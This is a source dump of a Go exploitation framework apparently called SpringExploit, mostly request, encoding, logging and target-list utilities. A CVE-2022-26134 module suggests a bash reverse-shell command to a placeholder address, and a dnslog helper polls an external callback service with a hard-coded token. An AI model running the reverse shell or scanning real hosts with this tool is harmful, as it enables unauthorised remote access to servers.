CVE202226134) completer(d prompt.Document) []prompt.Suggest { 98 | s := []prompt.Suggest{ 99 | {Text: "id", Description: "you can type command {id}"}, 100 | {Text: "bash", Description: "you can type command bash -c $@|bash 0 echo bash -i >& /dev/tcp/127.0.0.1/8090 0>&1"}, 101 | } 102 | return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true) 103 | } 104 | -------------------------------------------------------------------------------- /cmd/commons/poc/IsAliveUrl.go: -------------------------------------------------------------------------------- 1 | package poc 2 | 3 | import ( 4 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 5 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 6 | "github.com/imroc/req/v3" 7 | log "github.com/sirupsen/logrus" 8 | ) 9 | 10 | type IsAliveUrl struct{} 11 | 12 | func (t IsAliveUrl) SendPoc(target string, hashmap map[string]interface{}) { 13 | reqmap := req2.NewReqInfoToMap(hashmap) 14 | reqmap["url"] = target 15 | reqmap["method"] = "HEAD" 16 | headers := map[string]string{ 17 | "User-Agent": utils.GetUA(), 18 | } 19 | reqmap["headers"] = headers 20 | resp := utils.Send(reqmap) 21 | if t.CheckExp(resp, target, hashmap) { 22 | log.Infof("[+] %s is alive", target) 23 | } 24 | 25 | } 26 | 27 | func (t IsAliveUrl) SaveResult(target string, file string) { 28 | // nothing to do 29 | } 30 | 31 | func (t IsAliveUrl) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool { 32 | reqmap := req2.NewReqInfoToMap(hashmap) 33 | reqmap["url"] = target 34 | reqmap["method"] = "HEAD" 35 | reqmap["redirect"] = true 36 | headers := map[string]string{ 37 | "User-Agent": utils.GetUA(), 38 | } 39 | reqmap["headers"] = headers 40 | resp2 := utils.Send(reqmap) 41 | intcode := resp2.GetStatusCode() 42 | log.Debugf(" %d ", intcode) 43 | 44 | if intcode >= 0 { 45 | return true 46 | } 47 | return true 48 | } 49 | -------------------------------------------------------------------------------- /cmd/commons/poc/PoC.go: -------------------------------------------------------------------------------- 1 | package poc 2 | 3 | import "github.com/imroc/req/v3" 4 | 5 | // PoC poc接口 6 | type PoC interface { 7 | SendPoc(target string, hashmap map[string]interface{}) 8 | SaveResult(target string, file string) 9 | CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool 10 | } 11 | -------------------------------------------------------------------------------- /cmd/commons/poc/demo.go: -------------------------------------------------------------------------------- 1 | package poc 2 | 3 | import ( 4 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 5 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 6 | "github.com/c-bata/go-prompt" 7 | "github.com/imroc/req/v3" 8 | log "github.com/sirupsen/logrus" 9 | ) 10 | 11 | type Demo struct{} 12 | 13 | func (d Demo) SendPoc(target string, hashmap map[string]interface{}) { 14 | 15 | log.Debugf("[+] Running default poc") 16 | //reqinfo := req2.NewReqInfo() 17 | //reqmap := structs.Map(reqinfo) 18 | reqmap := req2.NewReqInfoToMap(hashmap) 19 | // TODO 每次传入的url 都是标准的 http(s)://host:port/path 20 | // 可以使用 url.Parse 来解析获取 host 和 port 21 | // for example: 22 | //result, err := url.Parse(target) 23 | //if err != nil { 24 | // log.Debugln("[-] url parse error") 25 | // log.Errorf("[-] url parse error: %s", err) 26 | // return 27 | //} 28 | //target = result.Scheme + "://" + result.Host + result.Port() + "/" + result.Path 29 | 30 | reqmap["url"] = target 31 | 32 | // 请求方法 33 | reqmap["method"] = "GET" 34 | // 默认随机UA 不需要设置 35 | reqmap["headers"] = map[string]string{ 36 | "User-Agent": utils.GetUA(), 37 | } 38 | // 请求body 39 | reqmap["body"] = "" 40 | 41 | // TODO 可以设置超时时间 重复次数 代理等 下面默认使用默认值 42 | //reqmap["timeout"] = hashmap["Timeout"].(int) 43 | //reqmap["retry"] = hashmap["Retry"].(int) 44 | //reqmap["proxy"] = hashmap["Proxy"].(string) 45 | //reqmap["mode"] = hashmap["Mode"].(int) 46 | //reqmap["h1"] = hashmap["H1"].(bool) 47 | // 发送请求, 获取响应 resp := utils.Send(reqmap) 48 | 49 | resp := utils.Send(reqmap) 50 | log.Debugln("[+] resp: ", resp.Dump()) 51 | 52 | // TODO check exp 53 | d.CheckExp(resp, target, hashmap) 54 | 55 | // TODO 保存结果 56 | d.SaveResult(target, hashmap["Out"].(string)) 57 | 58 | } 59 | 60 | func (d Demo) init() { 61 | log.Debugln("[+] Registering Demo poc") 62 | 63 | } 64 | 65 | // SaveResult 保存结果 66 | func (d Demo) SaveResult(target, file string) { 67 | log.Debugf("[+] save result") 68 | // TODO 保存结果 69 | utils.SaveToFile(target, file) 70 | 71 | } 72 | 73 | func (d Demo) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool { 74 | defer func() { 75 | if err := recover(); err != nil { 76 | log.Error("[-] CheckExp error: ", err) 77 | } 78 | }() 79 | log.Debugf("[+] check exp") 80 | return false 81 | } 82 | 83 | func completer(d prompt.Document) []prompt.Suggest { 84 | s := []prompt.Suggest{ 85 | {Text: "id", Description: "you can type command {id}"}, 86 | } 87 | return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true) 88 | } 89 | -------------------------------------------------------------------------------- /cmd/commons/req/request.go: -------------------------------------------------------------------------------- 1 | package req 2 | 3 | import ( 4 | "github.com/fatih/structs" 5 | ) 6 | 7 | type ReqInfo struct { 8 | Method string 9 | Url string 10 | Body string 11 | Header map[string]string 12 | Proxy string 13 | Timeout string 14 | Retry string 15 | Mode string 16 | H1 bool 17 | Redirect bool 18 | } 19 | 20 | //func (r *ReqInfo) Method() string { 21 | // return r.Method 22 | //} 23 | // 24 | //func (r *ReqInfo) SetMethod(method string) { 25 | // r.Method = method 26 | //} 27 | // 28 | //func (r *ReqInfo) Url() string { 29 | // return r.Url 30 | //} 31 | // 32 | //func (r *ReqInfo) SetUrl(url string) { 33 | // r.Url = url 34 | //} 35 | // 36 | //func (r *ReqInfo) Body() string { 37 | // return r.Body 38 | //} 39 | // 40 | //func (r *ReqInfo) SetBody(body string) { 41 | // r.Body = body 42 | //} 43 | // 44 | //func (r *ReqInfo) Header() map[string]string { 45 | // return r.Header 46 | //} 47 | // 48 | //func (r *ReqInfo) SetHeader(header map[string]string) { 49 | // r.Header = header 50 | //} 51 | // 52 | //func (r *ReqInfo) Proxy() string { 53 | // return r.Proxy 54 | //} 55 | // 56 | //func (r *ReqInfo) SetProxy(proxy string) { 57 | // r.Proxy = proxy 58 | //} 59 | // 60 | //func (r *ReqInfo) Timeout() string { 61 | // return r.Timeout 62 | //} 63 | // 64 | //func (r *ReqInfo) SetTimeout(timeout string) { 65 | // r.Timeout = timeout 66 | //} 67 | // 68 | //func (r *ReqInfo) Repeat() string { 69 | // return r.Repeat 70 | //} 71 | // 72 | //func (r *ReqInfo) SetRepeat(repeat string) { 73 | // r.Repeat = repeat 74 | //} 75 | // 76 | //func (r *ReqInfo) Mode() string { 77 | // return r.Mode 78 | //} 79 | // 80 | //func (r *ReqInfo) SetMode(mode string) { 81 | // r.Mode = mode 82 | //} 83 | 84 | //func NewReqInfo(hashmap map[string]interface{}) *ReqInfo { 85 | // reqInfo := &ReqInfo{ 86 | // method: hashmap["method"].(string), 87 | // url: hashmap["url"].(string), 88 | // body: hashmap["body"].(string), 89 | // header: hashmap["header"].(map[string]string), 90 | // proxy: hashmap["proxy"].(string), 91 | // timeout: hashmap["timeout"].(string), 92 | // repeat: hashmap["repeat"].(string), 93 | // mode: hashmap["mode"].(string), 94 | // } 95 | // 96 | // return reqInfo 97 | //} 98 | 99 | func NewReqInfo() ReqInfo { 100 | reqInfo := ReqInfo{ 101 | Method: "", 102 | Url: "", 103 | Body: "", 104 | Header: make(map[string]string), 105 | Proxy: "", 106 | Timeout: "10", 107 | Retry: "3", 108 | Mode: "0", 109 | H1: false, 110 | Redirect: false, 111 | } 112 | return reqInfo 113 | } 114 | 115 | func NewReqInfoToMap(hashmap map[string]interface{}) map[string]interface{} { 116 | reqInfo := ReqInfo{ 117 | Method: "", 118 | Url: "", 119 | Body: "", 120 | Header: make(map[string]string), 121 | Proxy: "", 122 | Timeout: "10", 123 | Retry: "3", 124 | Mode: "0", 125 | H1: false, 126 | Redirect: false, 127 | } 128 | reqmap := structs.Map(reqInfo) 129 | reqmap["timeout"] = hashmap["Timeout"].(int) 130 | reqmap["retry"] = hashmap["Retry"].(int) 131 | reqmap["mode"] = hashmap["Mode"].(int) 132 | reqmap["h1"] = hashmap["H1"].(bool) 133 | reqmap["proxy"] = hashmap["Proxy"].(string) 134 | reqmap["redirect"] = hashmap["Redirect"].(bool) 135 | reqmap["body"] = "" 136 | 137 | return reqmap 138 | } 139 | 140 | //// UrlEncode 将传入的url进行url编码 141 | //func UrlEncode(target string) string { 142 | // 143 | // // 对传入的字符串进行UrlEncode 144 | // 145 | // target = escape(target) 146 | // 147 | // return target 148 | // 149 | //} 150 | // 151 | //const upperhex = "0123456789ABCDEF" 152 | // 153 | //func escape(s string, ) string { 154 | // spaceCount, hexCount := 0, 0 155 | // for i := 0; i < len(s); i++ { 156 | // c := s[i] 157 | // 158 | // if c == ' ' { 159 | // spaceCount++ 160 | // } else { 161 | // hexCount++ 162 | // } 163 | // 164 | // } 165 | // 166 | // if spaceCount == 0 && hexCount == 0 { 167 | // return s 168 | // } 169 | // 170 | // var buf [64]byte 171 | // var t []byte 172 | // 173 | // required := len(s) + 2*hexCount 174 | // if required <= len(buf) { 175 | // t = buf[:required] 176 | // } else { 177 | // t = make([]byte, required) 178 | // } 179 | // 180 | // if hexCount == 0 { 181 | // copy(t, s) 182 | // for i := 0; i < len(s); i++ { 183 | // if s[i] == ' ' { 184 | // t[i] = '+' 185 | // } 186 | // } 187 | // return string(t) 188 | // } 189 | // 190 | // j := 0 191 | // for i := 0; i < len(s); i++ { 192 | // switch c := s[i]; { 193 | // case c == ' ': 194 | // t[j] = '+' 195 | // j++ 196 | // case true: 197 | // t[j] = '%' 198 | // t[j+1] = upperhex[c>>4] 199 | // t[j+2] = upperhex[c&15] 200 | // j += 3 201 | // default: 202 | // t[j] = s[i] 203 | // j++ 204 | // } 205 | // } 206 | // return string(t) 207 | //} 208 | -------------------------------------------------------------------------------- /cmd/commons/req/transform.go: -------------------------------------------------------------------------------- 1 | package req 2 | 3 | import ( 4 | "bytes" 5 | "encoding/hex" 6 | "errors" 7 | "io/ioutil" 8 | "sort" 9 | "strings" 10 | "unicode/utf8" 11 | 12 | "golang.org/x/text/encoding/simplifiedchinese" 13 | "golang.org/x/text/transform" 14 | ) 15 | 16 | const ( 17 | utf8s = "utf-8,utf8,UTF8,UTF-8" 18 | chinese = "gb2312,Gb2312,GB2312,gbk,GBK,Gbk,gb18030,GB18030,Gb18030" 19 | ) 20 | 21 | var ( 22 | rune2byte = []byte{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'} 23 | ) 24 | 25 | // UrlEncode 把Http请求参数按照指定编码进行UrlEncode编码 26 | // 27 | //@Param encoding 支持uft8 gbk gb2312 gb18030编码方式 28 | func UrlEncode(params map[string]string, encoding string) (string, error) { 29 | if params == nil { 30 | return "", nil 31 | } 32 | isChinese := strings.Contains(chinese, encoding) 33 | isUtf8 := strings.Contains(utf8s, encoding) 34 | 35 | if !(isChinese || isUtf8) { 36 | return "", errors.New("unrecognized encoding") 37 | } 38 | 39 | keys := make([]string, 0, len(params)) 40 | for k := range params { 41 | keys = append(keys, k) 42 | } 43 | sort.Strings(keys) 44 | 45 | builder := strings.Builder{} 46 | for _, k := range keys { 47 | builder.WriteString(encode(k, isChinese)) 48 | builder.WriteByte('=') 49 | builder.WriteString(encode(params[k], isChinese)) 50 | builder.WriteByte('&') 51 | } 52 | str := builder.String() 53 | str = strings.TrimSuffix(str, "&") 54 | 55 | return str, nil 56 | } 57 | 58 | // UrlDecode 解码UrlEncode编码的字符串 59 | // 60 | // @Param encoding 支持uft8 gbk gb2312 gb18030编码方式 61 | func UrlDecode(str string, encoding string) (map[string]string, error) { 62 | if str == "" { 63 | return nil, nil 64 | } 65 | isChinese := strings.Contains(chinese, encoding) 66 | isUtf8 := strings.Contains(utf8s, encoding) 67 | 68 | if !(isChinese || isUtf8) { 69 | return nil, errors.New("unrecognized encoding") 70 | } 71 | 72 | parts := strings.Split(str, "&") 73 | rst := make(map[string]string, len(parts)) 74 | for _, p := range parts { 75 | kv := strings.Split(p, "=") 76 | key, _ := decode(kv[0], isChinese) 77 | if len(kv) > 1 { 78 | val, _ := decode(kv[1], isChinese) 79 | rst[key] = val 80 | } else { 81 | rst[key] = "" 82 | } 83 | } 84 | 85 | return rst, nil 86 | } 87 | 88 | // Encode 对输入字符出按照指定编码进行UrlEncode处理 89 | // 90 | // @Param encoding 支持uft8 gbk gb2312 gb18030编码方式 91 | func Encode(str string, encoding string) (string, error) { 92 | if str == "" { 93 | return "", nil 94 | } 95 | isChinese := strings.Contains(chinese, encoding) 96 | isUtf8 := strings.Contains(utf8s, encoding) 97 | 98 | if !(isChinese || isUtf8) { 99 | return "", errors.New("unrecognized encoding") 100 | } 101 | return encode(str, isChinese), nil 102 | } 103 | 104 | // Decode 解码UrlEncode编码的字符串 105 | // 106 | // @Param encoding 支持uft8 gbk gb2312 gb18030编码方式 107 | func Decode(str string, encoding string) (string, error) { 108 | if str == "" { 109 | return "", nil 110 | } 111 | isChinese := strings.Contains(chinese, encoding) 112 | isUtf8 := strings.Contains(utf8s, encoding) 113 | 114 | if !(isChinese || isUtf8) { 115 | return "", errors.New("unrecognized encoding") 116 | } 117 | return decode(str, isChinese) 118 | } 119 | 120 | func decode(str string, isChinese bool) (string, error) { 121 | runes := []rune(str) 122 | length := len(runes) 123 | buf := new(bytes.Buffer) 124 | i := 0 125 | for i < length { 126 | r := runes[i] 127 | if r != '%' { 128 | buf.WriteRune(r) 129 | i++ 130 | } else { 131 | b, err := parseEncodeByte(runes[i+1], runes[i+2]) 132 | if err != nil { 133 | return "", err 134 | } 135 | buf.WriteByte(b) 136 | i += 3 137 | } 138 | } 139 | if isChinese { 140 | data, _ := ioutil.ReadAll(transform.NewReader(buf, simplifiedchinese.GB18030.NewDecoder())) 141 | return string(data), nil 142 | } else { 143 | return buf.String(), nil 144 | } 145 | } 146 | 147 | func encode(str string, isChinese bool) string { 148 | builder := strings.Builder{} 149 | for _, r := range str { 150 | 151 | if !shouldEscape(r) { 152 | builder.WriteRune(r) 153 | continue 154 | } 155 | 156 | p := make([]byte, utf8.UTFMax) 157 | c := utf8.EncodeRune(p, r) 158 | var data []byte 159 | if isChinese { 160 | data, _ = ioutil.ReadAll(transform.NewReader(bytes.NewReader(p[0:c]), simplifiedchinese.GB18030.NewEncoder())) 161 | } else { 162 | data = p[0:c] 163 | } 164 | 165 | target := make([]byte, len(data)*2) 166 | hex.Encode(target, data) 167 | 168 | i := 0 169 | for ; i < len(target); i += 2 { 170 | builder.WriteByte('%') 171 | builder.Write([]byte{target[i], target[i+1]}) 172 | } 173 | } 174 | return builder.String() 175 | } 176 | 177 | func shouldEscape(r rune) bool { 178 | //return !((r >= '0' && r <= '9') || 179 | // (r >= 'a' && r <= 'z') || 180 | // (r >= 'A' && r <= 'Z') || 181 | // r == '-' || r == '_' || r == '.') 182 | return true 183 | } 184 | 185 | func parseEncodeByte(high rune, low rune) (byte, error) { 186 | if high >= 65 && high <= 90 { 187 | high = high + 32 188 | } 189 | if low >= 65 && low <= 90 { 190 | low = low + 32 191 | } 192 | i := byteOfRune(high) 193 | if i == -1 { 194 | return 0, errors.New("invalid arguments") 195 | } 196 | j := byteOfRune(low) 197 | 198 | if j == -1 { 199 | return 0, errors.New("invalid arguments") 200 | } 201 | return byte((0x0f&i)<<4 + (0x0f & j)), nil 202 | } 203 | 204 | func byteOfRune(r rune) int { 205 | for i, b := range rune2byte { 206 | if r == rune(b) { 207 | return i 208 | } 209 | } 210 | return -1 211 | } 212 | -------------------------------------------------------------------------------- /cmd/commons/resp/resp.go: -------------------------------------------------------------------------------- 1 | package resp 2 | 3 | import ( 4 | "github.com/imroc/req/v3" 5 | log "github.com/sirupsen/logrus" 6 | ) 7 | 8 | func HandlerRespHeader(rsp *req.Response, key string) string { 9 | log.Debugf("HandlerRespHeader: %s", key) 10 | res := rsp.Header.Get(key) 11 | //// 提取响应头中key的值 12 | //// 将res中的响应头部分按行分割 13 | //log.Debugf("HandlerRespHeader: %s", res) 14 | //lines := strings.Split(res, "\r\n") 15 | //if len(lines) < 2 { 16 | // lines = strings.Split(res, "\n") 17 | //} 18 | //// 寻找存在key的那一行 19 | //for _, line := range lines { 20 | // // 如果存在key,则返回key对应的值 21 | // if strings.Contains(line, key) { 22 | // return strings.TrimSpace(strings.Split(line, " ")[1]) 23 | // } 24 | //} 25 | 26 | if res == "" { 27 | return "" 28 | } 29 | 30 | return res 31 | 32 | } 33 | -------------------------------------------------------------------------------- /cmd/commons/utils/base64.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "encoding/base64" 5 | log "github.com/sirupsen/logrus" 6 | ) 7 | 8 | // EncodeBase64String Base64Encode encodes the given string to base64 9 | func EncodeBase64String(str string) string { 10 | return base64.StdEncoding.EncodeToString([]byte(str)) 11 | } 12 | 13 | // DecodeBase64String decode the base64 string return string 14 | func DecodeBase64String(str string) string { 15 | decoded, err := base64.StdEncoding.DecodeString(str) 16 | if err != nil { 17 | log.Debug("Error decoding base64 string: ", err) 18 | return "" 19 | } else { 20 | return string(decoded) 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /cmd/commons/utils/dnslog.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "github.com/imroc/req/v3" 5 | log "github.com/sirupsen/logrus" 6 | "time" 7 | ) 8 | 9 | const dnslogPre = "http://eyes.sh/api/" 10 | const skysa = "/skysa/" 11 | const token = "/?token=69a0b901" 12 | 13 | type Dnslog struct { 14 | id string 15 | pre string // dns or web 16 | } 17 | 18 | func (d *Dnslog) Pre() string { 19 | return d.pre 20 | } 21 | 22 | func (d *Dnslog) SetPre(pre string) { 23 | d.pre = pre 24 | } 25 | 26 | func (d *Dnslog) Id() string { 27 | return d.id 28 | } 29 | 30 | func (d *Dnslog) SetId(id string) { 31 | d.id = GetCode(16) 32 | //d.id = id 33 | } 34 | 35 | func (d *Dnslog) GetDnslog() bool { 36 | uuid := d.Id() 37 | //uuid := "dnslog" 38 | log.Debugln("uuid: ", uuid) 39 | d.SetId(uuid) 40 | t := d.Pre() 41 | log.Debugln("type: ", t) 42 | url := dnslogPre + t + skysa + uuid + token 43 | time.Sleep(time.Second * 3) 44 | log.Debugf("url: %s", url) 45 | resp, _ := req.R().Get(url) 46 | log.Debugln(resp.String()) 47 | if resp.String() == "True" { 48 | return true 49 | } 50 | return false 51 | } 52 | -------------------------------------------------------------------------------- /cmd/commons/utils/file.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import "os" 4 | 5 | // Mkdir 创建文件夹 6 | func Mkdir(dir string) error { 7 | if _, err := os.Stat(dir); os.IsNotExist(err) { 8 | err := os.MkdirAll(dir, 0755) 9 | if err != nil { 10 | return err 11 | } 12 | } 13 | return nil 14 | } 15 | -------------------------------------------------------------------------------- /cmd/commons/utils/httpclient.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "github.com/imroc/req/v3" 5 | log "github.com/sirupsen/logrus" 6 | "time" 7 | ) 8 | 9 | func InIt(mode int, timeout int, proxy string, retry int, h1 bool, redirect bool) (client *req.Client) { 10 | log.Debugf("init httpclient") 11 | client = req.NewClient() 12 | if mode != 0 { 13 | client.EnableDumpAll().EnableDebugLog() 14 | } 15 | 16 | // TODO client.DisableAutoReadResponse() 不能开启DisableAutoReadResponse 不然CVE-2022-1388 漏洞无法验证 17 | if h1 { 18 | // TODO 强制开启 EnableForceHTTP1 CVE-2022-1388 漏洞设置http代理的情况下必须强制开启HTTP1 其他情况框架会自动判断使用什么版本http协议 19 | client.EnableForceHTTP1() 20 | } 21 | 22 | client.SetLogger(log.StandardLogger()) 23 | // 设置超时时间 24 | client.SetTimeout(time.Duration(timeout) * time.Second) 25 | client.SetCommonRetryCount(retry) 26 | 27 | client.EnableInsecureSkipVerify() 28 | // 重定向设置, 如果不设置, 默认为true 即重定向 29 | if !redirect { 30 | log.Debug("redirect is false") 31 | client.SetRedirectPolicy(req.NoRedirectPolicy()) 32 | } 33 | // 设置代理 34 | f := IsProxyUrl(proxy) 35 | if f { 36 | proxy = GetProxyUrl(proxy) 37 | client.SetProxyURL(proxy) 38 | } else if proxy == "" { 39 | 40 | } else { 41 | log.Error("proxy: " + proxy + " is not a valid url") 42 | return nil 43 | } 44 | return client 45 | } 46 | 47 | func Send(hashmap map[string]interface{}) (resp *req.Response) { 48 | log.Debugln("send requesting") 49 | method := hashmap["method"].(string) 50 | url := hashmap["url"].(string) 51 | proxy := hashmap["proxy"].(string) 52 | retry := hashmap["retry"].(int) 53 | timeout := hashmap["timeout"].(int) 54 | mode := hashmap["mode"].(int) 55 | headers := hashmap["headers"].(map[string]string) 56 | body := hashmap["body"] 57 | h1 := hashmap["h1"].(bool) 58 | redirect := hashmap["redirect"].(bool) 59 | 60 | client := InIt(mode, timeout, proxy, retry, h1, redirect) 61 | 62 | //reqt := client.R().EnableDump() 63 | reqt := client.R() 64 | reqs := SetRequest(reqt, headers, body.(string)) 65 | resp, errs := reqs.Send(method, url) 66 | log.Debugln("send request success", resp.Dump()) 67 | if resp == nil || errs != nil { 68 | log.Debug("requesting error: " + errs.Error()) 69 | if resp == nil { 70 | log.Info("resp is nil") 71 | } 72 | return resp 73 | } 74 | 75 | return resp 76 | } 77 | -------------------------------------------------------------------------------- /cmd/commons/utils/ips.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import "github.com/projectdiscovery/mapcidr" 4 | 5 | func GetIPToUrlsLinks(ip string, urls []string) []string { 6 | 7 | subnets, _ := mapcidr.IPAddresses(ip) 8 | for _, subnet := range subnets { 9 | link := "http://" + subnet + "/" 10 | urls = append(urls, link) 11 | // 增加https 12 | links := "https://" + subnet + "/" 13 | urls = append(urls, links) 14 | } 15 | return urls 16 | } 17 | -------------------------------------------------------------------------------- /cmd/commons/utils/proxy.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | log "github.com/sirupsen/logrus" 5 | "net/url" 6 | "strings" 7 | ) 8 | 9 | func IsProxyUrl(proxy string) bool { 10 | 11 | if strings.Contains(proxy, ":") { 12 | return true 13 | } 14 | return false 15 | 16 | } 17 | 18 | func GetProxyUrl(proxy string) (proxys string) { 19 | 20 | url, err := url.Parse(proxy) 21 | if err != nil { 22 | log.Errorf(err.Error()) 23 | return 24 | } else { 25 | proxys = url.Scheme + "://" + url.Host 26 | } 27 | return proxys 28 | 29 | } 30 | -------------------------------------------------------------------------------- /cmd/commons/utils/readfile.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "bufio" 5 | "github.com/projectdiscovery/stringsutil" 6 | log "github.com/sirupsen/logrus" 7 | "os" 8 | "os/exec" 9 | "path/filepath" 10 | "strings" 11 | ) 12 | 13 | func ReadFile(path string) (urls []string, err error) { 14 | log.Info("Reading file: ", path) 15 | file, err := os.Open(path) 16 | if err != nil { 17 | log.Error("An error occurred on opening the inputfile\n" + 18 | "Does the file exist?\n" + 19 | "Have you got acces to it?\n") 20 | return nil, err 21 | } 22 | defer func(file *os.File) { 23 | err := file.Close() 24 | if err != nil { 25 | log.Error("An error occurred on closing the inputfile\n" + 26 | "Does the file exist?\n" + 27 | "Have you got acces to it?\n") 28 | } 29 | }(file) 30 | iReader := bufio.NewReader(file) 31 | var lins []string 32 | for { 33 | str, err := iReader.ReadString('\n') 34 | if err != nil { 35 | return lins, err // error or EOF 36 | } 37 | // 如果是空行,则跳过 38 | if strings.TrimSpace(str) == "" { 39 | continue 40 | } 41 | //如果str结尾存在\n,则去掉 42 | //if strings.HasSuffix(str, "\n") { 43 | // str = strings.TrimSuffix(str, "\n") 44 | //} 45 | //如果str结尾存在\r,则去掉 46 | //if strings.HasSuffix(str, "\r") { 47 | // str = strings.TrimSuffix(str, "\r") 48 | //} 49 | //// 如果str结尾存在\r\n,则去掉 50 | //if strings.HasSuffix(str, "\r\n") { 51 | // str = strings.TrimSuffix(str, "\r\n") 52 | //} 53 | 54 | if stringsutil.HasSuffixAny(str, "\r\n", "\n", "\r") { 55 | str = stringsutil.TrimSuffixAny(str, "\r\n", "\n", "\r") 56 | } 57 | log.Debugf("The url is : %s", str) 58 | lins = append(lins, str) 59 | } 60 | return lins, nil 61 | } 62 | 63 | func getpath() string { 64 | file, _ := exec.LookPath(os.Args[0]) 65 | path1, _ := filepath.Abs(file) 66 | filename := filepath.Dir(path1) 67 | var path string 68 | if strings.Contains(filename, "/") { 69 | tmp := strings.Split(filename, `/`) 70 | tmp[len(tmp)-1] = `` 71 | path = strings.Join(tmp, `/`) 72 | } else if strings.Contains(filename, `\`) { 73 | tmp := strings.Split(filename, `\`) 74 | tmp[len(tmp)-1] = `` 75 | path = strings.Join(tmp, `\`) 76 | } 77 | return path 78 | } 79 | -------------------------------------------------------------------------------- /cmd/commons/utils/saveresult.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | log "github.com/sirupsen/logrus" 5 | "os" 6 | "path/filepath" 7 | ) 8 | 9 | // SaveToFile 保存结果到目标文件 10 | func SaveToFile(content string, file string) error { 11 | //打开文件,没有则创建,有则append内容 12 | //创建目录 13 | path := filepath.Dir(file) 14 | err := Mkdir(path) 15 | if err != nil { 16 | return err 17 | } 18 | w1, error := os.OpenFile(file, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0644) 19 | checkError(error) 20 | _, err1 := w1.Write([]byte(content + "\n")) 21 | checkError(err1) 22 | errC := w1.Close() 23 | checkError(errC) 24 | return nil 25 | } 26 | 27 | //写入文件 28 | func writeStringToFile(filepath, content string) { 29 | //打开文件,没有则创建,有则append内容 30 | w1, error := os.OpenFile(filepath, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0644) 31 | checkError(error) 32 | 33 | _, err1 := w1.Write([]byte(content + "\n")) 34 | checkError(err1) 35 | 36 | errC := w1.Close() 37 | checkError(errC) 38 | } 39 | 40 | //写入文件 41 | func writeBytesToFile(filepath string, content []byte) { 42 | //打开文件,没有此文件则创建文件,将写入的内容append进去 43 | w1, error := os.OpenFile(filepath, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0644) 44 | checkError(error) 45 | 46 | _, err1 := w1.Write(content) 47 | checkError(err1) 48 | 49 | errC := w1.Close() 50 | checkError(errC) 51 | } 52 | 53 | func checkError(err error) { 54 | if err != nil { 55 | log.Error("文件写入失败,错误信息:", err) 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /cmd/commons/utils/setrequest.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "github.com/imroc/req/v3" 5 | "net/http" 6 | ) 7 | 8 | // SetRequest 设置请求头和请求boby 9 | func SetRequest(req *req.Request, headers map[string]string, body string) *req.Request { 10 | //req.SetHeaders(headers) 11 | 12 | req.Headers = make(http.Header) 13 | for k, v := range headers { 14 | req.Headers[k] = []string{v} 15 | } 16 | req.SetBody(body) 17 | return req 18 | 19 | } 20 | -------------------------------------------------------------------------------- /cmd/commons/utils/useragent.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "bytes" 5 | "github.com/corpix/uarand" 6 | "math/rand" 7 | "time" 8 | ) 9 | 10 | // GetUA UserAgent generates a random user agent 11 | func GetUA() string { 12 | //return browser.Random() 13 | return uarand.GetRandom() 14 | } 15 | 16 | // GetCode 获取一个随机用户唯一编号 17 | func GetCode(codeLen int) string { 18 | // 1. 定义原始字符串 19 | rawStr := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" 20 | // 2. 定义一个buf,并且将buf交给bytes往buf中写数据 21 | buf := make([]byte, 0, codeLen) 22 | b := bytes.NewBuffer(buf) 23 | // 随机从中获取 24 | rand.Seed(time.Now().UnixNano()) 25 | for rawStrLen := len(rawStr); codeLen > 0; codeLen-- { 26 | randNum := rand.Intn(rawStrLen) 27 | b.WriteByte(rawStr[randNum]) 28 | } 29 | return b.String() 30 | } 31 | -------------------------------------------------------------------------------- /cmd/logs/LogToFile.go: -------------------------------------------------------------------------------- 1 | package logs 2 | 3 | import ( 4 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 5 | log "github.com/sirupsen/logrus" 6 | "io" 7 | "os" 8 | "path" 9 | "time" 10 | ) 11 | 12 | func SaveLogs(logfile string) { 13 | if logfile != "" { 14 | 15 | f, err := os.OpenFile(logfile, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0666) 16 | if err == nil { 17 | mw := io.MultiWriter(os.Stdout, f) 18 | log.SetOutput(mw) 19 | log.SetFormatter(&log.TextFormatter{ 20 | ForceColors: true, 21 | FullTimestamp: true, 22 | //TimestampFormat: "2006-01-02 15:04:05", 23 | }) 24 | log.SetReportCaller(true) 25 | log.Debugln("Saving logs to file " + logfile) 26 | } else { 27 | log.Info("Failed to log to file, using default stderr") 28 | } 29 | 30 | } else { 31 | logfile := "logs/log-" + time.Now().Format("202204221616") + ".txt" 32 | 33 | err := utils.Mkdir(path.Dir(logfile)) 34 | if err != nil { 35 | log.Debugln("Failed to create logs directory") 36 | return 37 | } 38 | f, err := os.OpenFile(logfile, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0666) 39 | if err == nil { 40 | mw := io.MultiWriter(os.Stdout, f) 41 | 42 | log.SetOutput(mw) 43 | format := log.TextFormatter{ 44 | ForceColors: true, 45 | FullTimestamp: true, 46 | 